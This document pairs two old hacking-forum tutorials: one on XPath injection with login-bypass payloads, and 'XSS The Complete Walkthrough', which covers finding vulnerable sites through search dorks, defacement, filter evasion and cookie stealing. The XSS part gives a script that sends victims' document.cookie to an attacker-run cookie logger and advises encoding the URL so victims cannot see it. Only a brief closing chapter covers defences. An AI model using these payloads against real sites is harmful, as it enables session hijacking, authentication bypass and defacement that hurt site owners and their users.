Similar to SQL Injections, XPath injections manipulate data on XML databases. Therefore, an analogy can be created to relate the two injection methods. They share many things in common, such as the use of regex expres<i></i>sions, and, most importantly, their payload; in this case, to obtain data from a server locally, or in most cases remotely from the client.

Assuming, you know XML and XPATH, we\'re going to dive directly into the attack Methodology by using examples of exploitable vulnerabilities.

1ST EXAMPLE: Similarities to SQL...

In SQL, we use regex expres<i></i>sions to \"trick\" the server, by passing (somewhat) malicious input to it, like:

if the login system was setup as follows:
Select * from users where LoginID=\' \' and passwd=\' \'

we can exploit as such:
abc\' or 1=1 --

and we\'ll have a payload or desired input query passed to the server to execute our input, thus making it be:
Select * from users where LoginID = \'abc\' or 1=1 -- \'and passwd=\' \'

we commented out the password requirement, and passed only our LoginID, which turns out to be TRUE.

The Same concept applies to XML databases/documents with a XPath Injections...
That same code, when translated to XPath, becomes:

For the Insecure/exploitable Login System, accepts input as follows:
String(//users[LoginID/text()=\' \" + txtLoginID.Text + \" \' and passwd/text()=\' \"+ txtPasswd.Text +\" \'])

Now, we type into the LoginID:
abc\' or 1=1 or \'a\'=\'b

Thus, also suppressing the need to type in a password, and turns our loginID into a valid one from the database/document in XML. Like:
String(//users[LoginID/text()=\'abc\' or 1=1 or \'a\'=\'b\' and passwd/text()=\'\'])

We get a payload/desired input query passed as:
LoginID=\'abc\' or 1=1 or \'a\'=\'b\' and passwd/text()=\' \'

(which can also be represented, logically, as A OR B OR C AND D)


2ND EXAMPLE: More complex Procedure...

Insecure/Exploitable Code in XML:
Xmldocument XmlDoc = new Xmldocument();
XmlDoc.Load(\"...\");
XPathNavigator nav = XmlDoc.CreateNavigator();
XPathexpres<i></i>sion expr = nav.Compile(\"string(
//user[name/text()=\'\"+TextBox1.Text+\"\' and password/text()=\'\"+TextBox2.Text+ \"\']/account/text())\");
String account=Convert.ToString(nav.Evaluate(expr));
if (account==\"\") {
// name+password pair is not found in the XML document -
// login failed. }
else {
// account found -> Login succeeded.
// Proceed into the application. }

for the username query, we place this injection:
\' or 1=1 or \'\'=\'

As a payload, we get this code parsed and executed by the server:
string(//user[name/text()=\'\' or 1=1 or \'\'=\'\' and password/text()=\'foobar\']/account/text())

Tada! Now, We get an output result of:
string(//user/account/text())

In other words, we have an instance of
//user/account/text()

What this does is log us in as the first user in the XML document.


CONCLUSION -
Hope you got something from this article. I will try to write an article on XML/XPath programming in the Future (if time allows).
But for now, learn at your own pace, and explore the depths of this notorious, yet esoteric attack. I also urge you to try a combination or blind injections, when you have time on your hands. For beginners, I hope this sparks your interest and hunger for more knowledge; I\'d suggest learning and doing HBH\'s web patching challenges, whichm by the ware, are my favourite here.

Truly doing something fishy,
- NETFISH.

WORKS CITED:
http://en.hakin9.org/attachments/xpath_new_en.pdf
http://palisade.plynt.com/issues/2005Jul/xpath-injection/
http://www.webappsec.org/projects/threat/classes/xpath_injection.shtml
http://www.spidynamics.com/spilabs/education/articles/code-injection.html
http://searchappsecurity.techtarget.com/sDefinition/0,,sid92_gci1193384,00.html

XSS The Complete Walkthrough

--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 1 - What is XSS?] +==--
--==+========================================================================+==--

\'XSS\' also known as \'CSS\' (Cross Site Scripting, Easily confused with \'Cascading Style Sheets\')
is a very common vulnerbility found in Web Applications, \'XSS\' allows the attacker to INSERT
malicous code, There are many types of XSS attacks, I will mention 3 of the most used.

The First Attack i wana talk about is \'URL XSS\' this means that the XSS wont stay on the page
it will only get executed if you have the malicous code in the URL and submit the url
we will talk more on how to use this in our advantage.

The Second Attack is input fields, Where ever you can insert data, it is very common, to be XSS
vulnerable, for example say we found a site with a search engine, Now in the search box you enter
\'hacker\' now hit enter, when the page loads, if it says your data like \'Found 100 Results For hacker\'
ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible
way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method,
Also wont stay on the server, this is for your eyes only.

The Third Attack, with this attack you will be able to INSERT data (code) and it will stay on the website.
now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also
inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles
Forums, just most places where you insert data and it stays there. now HTML is totally diffrent then PHP
HTML downloads to your pc and then your \'Browser\' parses/interprets the code, (thats why its source is viewable)
With PHP the code is interpretued on the server the script is hosted on, then the data is returned to the browser.
for PHP injection its rare, But it dont harm to try. Note: PHP code cant be injected into HTML page!


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 2 - Finding XSS Vulnerbilitys] +==--
--==+========================================================================+==--

Well to start finding these vulnerbilitys you can start checking out
Blogs, Forums, Shoutboxes, Comment Boxes, Search Box\'s, there are too many to mention.

Using \'Google Dorks\' to make the finding easyier, Ok if you wana get cracking, goto google.com and type
inurl:\"search.php?q=\" now that is a common page and has alot of results, to find out some attacks move
onto the next chapter.

Also note that most sites have XSS vulnerbilitys, its just having a good eye, and some good knowledge
on how to bypass there filteration.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 3 - The Basics On XSS] +==--
--==+========================================================================+==--

Well now to crack on, and start learning some Actual Methods, the most common used XSS injection is

<script>alert(\"XSS\")</script>

now this will alert a popup message, saying \"XSS\" without quotes, its easily editable.

So backtracking on the last chapter im assuming you remember we talked about, search.php?q=
well you can simple try the following on a website with the same thing,

http://site.com/search.php?q=<script>alert(\"XSS\")</script>

there are good chances of it working, but dont be worried if it dont, just try diffrent sites.

some other easy XSS (i dont think people realise they can insert HTML not just javascript)

http://site.com/search.php?q=<br><br><b><u>XSS</u></b>

if you see the bold text on the page and newlines then you knows its vuln, then can move on using some
methods explained later on in the tutorial.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 4 - Deface Methods] +==--
--==+========================================================================+==--

Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most used,

the first one being IMG SCR, now for those of you who dont know html, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC=\"http://site.com/yourDefaceIMAGE.png\"></body></html>

ok now if u change the link to a valid picture link, and save it and run it you will see what i mean.

Right now say you have found a Shoutbox, Comment box, or anything that shows your data after you submitted it
you could insert the following to make the picture display on the page.

<IMG SRC=\"http://site.com/yourDefaceIMAGE.png\">

the other tags are not needed has the page will already have them. (rare cases they will not)

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC=\"http://site.com/xss.swf\"

that will execute the flash video linked to it.

Or maybe using a pop or redirection?

<script>window.open( \"http://www.google.com/\" )</script>

There are many others ways that im not going to explain due to how busy i am, Its easy to lookup methods
using google and googleing for HTML tutorials, u can see how to embed Music ect.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 5 - Cookie Stealing] +==--
--==+========================================================================+==--

I decided to add this has its the most USEFULL method of XSS, and i havent seen any papers, covering it.

first grab the cookie logger from here: http://G0t-Root.net/tools/cookie.php

ok now you have it save it has a .php file and upload to your server, remember to create the file \'log.txt\' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = \"http://yourServer.com/cookielogger.php?c=\"+document.cookie

or

document.location = \"http://yourServer.com/cookielogger.php?c=\"+document.cookie


now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth.

Watch your file now for cookies, then you can hijack there session :D

but now you ask what if my site hasnt got, this kind of attack, it only shows data once and dont
store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it
and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = \"http://yourServer.com/cookielogger.php?c=\"+document.cookie

im not gona explain hexing it ect as it is pretty stright forward.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 6 - Filteration Bypassing] +==--
--==+========================================================================+==--

Alot of sites may seem vulnerable but not executing the code, well to solve this take note of this chapter.

Some common methods to bypass filteration is

\')alert(\'xss\');

or

\");alert(\'xss\');

that will do the same thing has <script>alert(\"XSS\")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert(\"XSS\") to test for XSS, has ive known sites block the keyword XSS
before.

Some other ways to bypass filteration

<script type=text/javascript>alert(\"t0pP8uZz\")</script>
<script>alert(\"t0pP8uZz\")</script>;
<script>alert(\"t0pP8uZz\");</script>
<script>alert(\"/t0pP8uZz\"/)</script>
<script>var var = 1; alert(var)</script>

Read the next chapter for another way to bypass magic quotes filteration.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 6 - Advanced XSS] +==--
--==+========================================================================+==--

Ok in this chapter were going to learn about some good techniqes, that i myself havent seen
being used before, but im sure you guys will like it.

ive came across many sites where \'Magic Quotes\' is on and therfore rendering some commands useless.

fear not, ive come up with a way using char codes (Decimals), to convert char code to Ascii.

The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here http://www.asciitable.com/

this will help you write what you want, In my examples ill be writing \"t0pP8uZz\" this is the following code

116 48 112 80 56 117 90 122

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)

Ok now \"String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)\" Is a JAVA (ASCII) way of saying

t0pP8uZz

and to use this with alerts ect, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122))</script>

Ok now this will display or message in this case \"t0pP8uZz\", this method is very usefull for
bypassing magic quotes and maybe some custom escaping of quotes.

Ok before i move on i wana talk about another method useing variables. lets declare one below

var myVar = 1

ok now myVar is a longer way of saying 1.

To use variables to our advantage in XSS, we could do the following

<script>var myVar = 1; alert(myVar)</script>

and this will display the variable contents again without using quotes.

There are many others methods, that im not going to talk about, XSS is a simple Attack.
and from here you should know what you need.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 7 - Securing XSS] +==--
--==+========================================================================+==--

Ok this was written for WebDevelopers (yeah right..) so im gona talk about how to secure your code.

if you found XSS bugs in your scripts, its easy to secure, take a look at the below code

if(isset($_POST[\'form\'])){echo \"<html><body>\" .$_POST[\'form\']. \"</body></html>\";}

Ok say the variable $_POST[\'from\'] was coming from a input box, then you have a XSS attack.
the following is a very easy way to secure that.

$charset=\'UTF-8\'; $data = htmlentities ($_POST[\'form\'], ENT_NOQUOTES, $charset);
if(isset($data)){echo \"<html><body>\" .$data. \"</body></html>\";}

now that will take all possible code and make it not executable. by turning it into stuff like
< ect...

You will not notice a diffrence when using htmlentries();

there are also another common function, striptags(), find more info at php.net/striptags

ok another way to show you how to secure INTEGER variables. (variables that will always contain a INT)

$this = $_GET[\'id\'];
echo \"you are viewing \" . $this . \"blog\";

now if we include ?id=<script>alert(\"XSS\")</script>
into the url its gona execute our code, a very easy way to secure this is using (int) check the following code

$this = (int)$_GET[\'id\'];
echo \"you are viewing \" . $this . \"blog\";

now if at anytime the varible contains anything but a Integer, it will return 0.

Thats enough said.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [The End] +==--
--==+========================================================================+==--

ps. this is not my article. just to help you out out some basic xss

article from milwo rm.com
main auther: t0pP8uZz